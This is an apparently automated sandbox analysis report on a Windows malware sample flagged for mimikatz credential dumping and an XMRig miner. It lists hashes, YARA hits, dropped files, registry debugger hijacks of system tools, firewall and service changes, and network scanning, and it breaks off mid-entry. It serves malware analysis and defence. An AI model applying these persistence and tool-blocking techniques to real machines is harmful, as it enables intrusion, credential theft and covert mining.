Analysis
-
max time kernel
150s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
07/05/2024, 20:00
Behavioral task
behavioral1
Sample
2024-05-07_a7edbd9f48301c943397047f776348ca_hacktools_icedid_mimikatz.exe
Resource
win7-20240221-en
General
-
Target
2024-05-07_a7edbd9f48301c943397047f776348ca_hacktools_icedid_mimikatz.exe
-
Size
9.0MB
-
MD5
a7edbd9f48301c943397047f776348ca
-
SHA1
2e4a904798c91632eef0fb4dccc01ae9e3c57e9d
-
SHA256
2cdd25465ed653d164ed54d91a30aa213a172ccff64d5fdafcbb803a30567f07
-
SHA512
71edbc24e10fe8a5bfa02730b0353de9a2d44a5d60772406e739f436a680725b8593fe9ea1e6399bbc44b2a026149e7e6cf6d82d80c2b2d79fdd5e5afdd6f52b
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4692 created 1468 4692 vkdejee.exe 37 -
Contacts a large (28710) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
resource yara_rule behavioral2/memory/1404-138-0x00007FF6E4390000-0x00007FF6E447E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
UPX dump on OEP (original entry point) 41 IoCs
resource yara_rule behavioral2/memory/2420-0-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/memory/2420-4-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/files/0x0007000000023417-7.dat UPX behavioral2/memory/3792-8-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/files/0x0007000000023463-134.dat UPX behavioral2/memory/1404-136-0x00007FF6E4390000-0x00007FF6E447E000-memory.dmp UPX behavioral2/memory/1404-138-0x00007FF6E4390000-0x00007FF6E447E000-memory.dmp UPX behavioral2/files/0x000700000002346e-154.dat UPX behavioral2/memory/1392-156-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp UPX behavioral2/memory/1392-160-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp UPX behavioral2/files/0x000700000002346b-164.dat UPX behavioral2/memory/3544-165-0x00007FF618110000-0x00007FF618230000-memory.dmp UPX behavioral2/memory/4500-171-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp UPX behavioral2/memory/4656-175-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp UPX behavioral2/memory/4400-179-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp UPX behavioral2/memory/3544-181-0x00007FF618110000-0x00007FF618230000-memory.dmp UPX behavioral2/memory/1452-184-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp UPX behavioral2/memory/5076-188-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp UPX behavioral2/memory/4460-192-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp UPX behavioral2/memory/3544-194-0x00007FF618110000-0x00007FF618230000-memory.dmp UPX behavioral2/memory/452-197-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp UPX behavioral2/memory/3544-200-0x00007FF618110000-0x00007FF618230000-memory.dmp UPX behavioral2/memory/2220-202-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp UPX behavioral2/memory/1404-210-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp UPX behavioral2/memory/2320-214-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp UPX behavioral2/memory/3544-216-0x00007FF618110000-0x00007FF618230000-memory.dmp UPX behavioral2/memory/4772-219-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp UPX behavioral2/memory/2288-223-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp UPX behavioral2/memory/3544-226-0x00007FF618110000-0x00007FF618230000-memory.dmp UPX behavioral2/memory/2640-228-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp UPX behavioral2/memory/4468-231-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp UPX behavioral2/memory/4140-233-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp UPX behavioral2/memory/452-235-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp UPX behavioral2/memory/3544-236-0x00007FF618110000-0x00007FF618230000-memory.dmp UPX behavioral2/memory/3952-238-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp UPX behavioral2/memory/3544-242-0x00007FF618110000-0x00007FF618230000-memory.dmp UPX behavioral2/memory/3544-250-0x00007FF618110000-0x00007FF618230000-memory.dmp UPX behavioral2/memory/3544-252-0x00007FF618110000-0x00007FF618230000-memory.dmp UPX behavioral2/memory/3544-289-0x00007FF618110000-0x00007FF618230000-memory.dmp UPX behavioral2/memory/3544-295-0x00007FF618110000-0x00007FF618230000-memory.dmp UPX behavioral2/memory/3544-299-0x00007FF618110000-0x00007FF618230000-memory.dmp UPX -
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/3544-181-0x00007FF618110000-0x00007FF618230000-memory.dmp xmrig behavioral2/memory/3544-194-0x00007FF618110000-0x00007FF618230000-memory.dmp xmrig behavioral2/memory/3544-200-0x00007FF618110000-0x00007FF618230000-memory.dmp xmrig behavioral2/memory/3544-216-0x00007FF618110000-0x00007FF618230000-memory.dmp xmrig behavioral2/memory/3544-226-0x00007FF618110000-0x00007FF618230000-memory.dmp xmrig behavioral2/memory/3544-236-0x00007FF618110000-0x00007FF618230000-memory.dmp xmrig behavioral2/memory/3544-242-0x00007FF618110000-0x00007FF618230000-memory.dmp xmrig behavioral2/memory/3544-250-0x00007FF618110000-0x00007FF618230000-memory.dmp xmrig behavioral2/memory/3544-252-0x00007FF618110000-0x00007FF618230000-memory.dmp xmrig behavioral2/memory/3544-289-0x00007FF618110000-0x00007FF618230000-memory.dmp xmrig behavioral2/memory/3544-295-0x00007FF618110000-0x00007FF618230000-memory.dmp xmrig behavioral2/memory/3544-299-0x00007FF618110000-0x00007FF618230000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/2420-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2420-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0007000000023417-7.dat mimikatz behavioral2/memory/3792-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/1404-138-0x00007FF6E4390000-0x00007FF6E447E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts vkdejee.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts vkdejee.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 964 netsh.exe 4408 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe vkdejee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" vkdejee.exe -
Executes dropped EXE 29 IoCs
pid Process 3792 vkdejee.exe 4692 vkdejee.exe 3376 wpcap.exe 864 pivnitiek.exe 1404 vfshost.exe 1184 xohudmc.exe 1360 fkjvgk.exe 1392 ibibzztte.exe 3544 fpibei.exe 4500 ibibzztte.exe 4656 ibibzztte.exe 4400 ibibzztte.exe 1452 ibibzztte.exe 5076 ibibzztte.exe 4460 ibibzztte.exe 452 ibibzztte.exe 2220 ibibzztte.exe 1404 ibibzztte.exe 2796 vkdejee.exe 2320 ibibzztte.exe 4772 ibibzztte.exe 2288 ibibzztte.exe 2640 ibibzztte.exe 4468 ibibzztte.exe 4140 ibibzztte.exe 452 ibibzztte.exe 3952 ibibzztte.exe 1568 fuinnkdmr.exe 5504 vkdejee.exe -
Loads dropped DLL 12 IoCs
pid Process 3376 wpcap.exe 3376 wpcap.exe 3376 wpcap.exe 3376 wpcap.exe 3376 wpcap.exe 3376 wpcap.exe 3376 wpcap.exe 3376 wpcap.exe 3376 wpcap.exe 864 pivnitiek.exe 864 pivnitiek.exe 864 pivnitiek.exe -
resource yara_rule behavioral2/files/0x0007000000023463-134.dat upx behavioral2/memory/1404-136-0x00007FF6E4390000-0x00007FF6E447E000-memory.dmp upx behavioral2/memory/1404-138-0x00007FF6E4390000-0x00007FF6E447E000-memory.dmp upx behavioral2/files/0x000700000002346e-154.dat upx behavioral2/memory/1392-156-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp upx behavioral2/memory/1392-160-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp upx behavioral2/files/0x000700000002346b-164.dat upx behavioral2/memory/3544-165-0x00007FF618110000-0x00007FF618230000-memory.dmp upx behavioral2/memory/4500-171-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp upx behavioral2/memory/4656-175-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp upx behavioral2/memory/4400-179-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp upx behavioral2/memory/3544-181-0x00007FF618110000-0x00007FF618230000-memory.dmp upx behavioral2/memory/1452-184-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp upx behavioral2/memory/5076-188-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp upx behavioral2/memory/4460-192-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp upx behavioral2/memory/3544-194-0x00007FF618110000-0x00007FF618230000-memory.dmp upx behavioral2/memory/452-197-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp upx behavioral2/memory/3544-200-0x00007FF618110000-0x00007FF618230000-memory.dmp upx behavioral2/memory/2220-202-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp upx behavioral2/memory/1404-210-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp upx behavioral2/memory/2320-214-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp upx behavioral2/memory/3544-216-0x00007FF618110000-0x00007FF618230000-memory.dmp upx behavioral2/memory/4772-219-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp upx behavioral2/memory/2288-223-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp upx behavioral2/memory/3544-226-0x00007FF618110000-0x00007FF618230000-memory.dmp upx behavioral2/memory/2640-228-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp upx behavioral2/memory/4468-231-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp upx behavioral2/memory/4140-233-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp upx behavioral2/memory/452-235-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp upx behavioral2/memory/3544-236-0x00007FF618110000-0x00007FF618230000-memory.dmp upx behavioral2/memory/3952-238-0x00007FF78D520000-0x00007FF78D57B000-memory.dmp upx behavioral2/memory/3544-242-0x00007FF618110000-0x00007FF618230000-memory.dmp upx behavioral2/memory/3544-250-0x00007FF618110000-0x00007FF618230000-memory.dmp upx behavioral2/memory/3544-252-0x00007FF618110000-0x00007FF618230000-memory.dmp upx behavioral2/memory/3544-289-0x00007FF618110000-0x00007FF618230000-memory.dmp upx behavioral2/memory/3544-295-0x00007FF618110000-0x00007FF618230000-memory.dmp upx behavioral2/memory/3544-299-0x00007FF618110000-0x00007FF618230000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 75 ifconfig.me 76 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\fkjvgk.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 vkdejee.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\fkjvgk.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content vkdejee.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2326C1864DE719190C396A6E8734D8B4 vkdejee.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2326C1864DE719190C396A6E8734D8B4 vkdejee.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File opened for modification C:\Windows\umubtmbps\bbrcgicuu\Packet.dll vkdejee.exe File created C:\Windows\gibpmken\vimpcsvc.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\docmicfg.xml vkdejee.exe File created C:\Windows\umubtmbps\upbdrjv\swrpwe.exe vkdejee.exe File opened for modification C:\Windows\umubtmbps\Corporate\log.txt cmd.exe File created C:\Windows\umubtmbps\bbrcgicuu\wpcap.exe vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\crli-0.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\libeay32.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\posh-0.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\vimpcsvc.xml vkdejee.exe File opened for modification C:\Windows\gibpmken\docmicfg.xml vkdejee.exe File created C:\Windows\umubtmbps\bbrcgicuu\scan.bat vkdejee.exe File opened for modification C:\Windows\gibpmken\vkdejee.exe 2024-05-07_a7edbd9f48301c943397047f776348ca_hacktools_icedid_mimikatz.exe File created C:\Windows\umubtmbps\bbrcgicuu\Packet.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\spoolsrv.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\xdvl-0.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\schoedcl.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\svschost.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\AppCapture64.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\AppCapture32.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\ssleay32.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\tucl-1.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\trfo-2.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\svschost.exe vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\vimpcsvc.xml vkdejee.exe File created C:\Windows\umubtmbps\bbrcgicuu\pivnitiek.exe vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\libxml2.dll vkdejee.exe File created C:\Windows\gibpmken\docmicfg.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\trch-1.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\Shellcode.ini vkdejee.exe File created C:\Windows\umubtmbps\Corporate\mimilib.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\cnli-1.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\coli-0.dll vkdejee.exe File opened for modification C:\Windows\gibpmken\schoedcl.xml vkdejee.exe File created C:\Windows\ime\vkdejee.exe vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\schoedcl.exe vkdejee.exe File created C:\Windows\gibpmken\svschost.xml vkdejee.exe File created C:\Windows\umubtmbps\bbrcgicuu\fuinnkdmr.exe vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\schoedcl.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\spoolsrv.xml vkdejee.exe File opened for modification C:\Windows\gibpmken\vimpcsvc.xml vkdejee.exe File created C:\Windows\umubtmbps\bbrcgicuu\wpcap.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\vimpcsvc.exe vkdejee.exe File created C:\Windows\gibpmken\spoolsrv.xml vkdejee.exe File created C:\Windows\gibpmken\schoedcl.xml vkdejee.exe File opened for modification C:\Windows\gibpmken\spoolsrv.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\ucl.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\svschost.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\docmicfg.xml vkdejee.exe File created C:\Windows\umubtmbps\Corporate\mimidrv.sys vkdejee.exe File created C:\Windows\gibpmken\vkdejee.exe 2024-05-07_a7edbd9f48301c943397047f776348ca_hacktools_icedid_mimikatz.exe File created C:\Windows\umubtmbps\UnattendGC\specials\tibe-2.dll vkdejee.exe File created C:\Windows\umubtmbps\bbrcgicuu\ip.txt vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\spoolsrv.exe vkdejee.exe File opened for modification C:\Windows\gibpmken\svschost.xml vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\docmicfg.exe vkdejee.exe File created C:\Windows\umubtmbps\Corporate\vfshost.exe vkdejee.exe File opened for modification C:\Windows\umubtmbps\bbrcgicuu\Result.txt fuinnkdmr.exe File created C:\Windows\umubtmbps\UnattendGC\specials\exma-1.dll vkdejee.exe File created C:\Windows\umubtmbps\UnattendGC\specials\zlib1.dll vkdejee.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2640 sc.exe 4704 sc.exe 2088 sc.exe 1564 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0007000000023417-7.dat nsis_installer_2 behavioral2/files/0x0011000000023427-15.dat nsis_installer_1 behavioral2/files/0x0011000000023427-15.dat nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 636 schtasks.exe 3560 schtasks.exe 4920 schtasks.exe -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing vkdejee.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" vkdejee.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" vkdejee.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" vkdejee.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ibibzztte.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ibibzztte.exe Key created 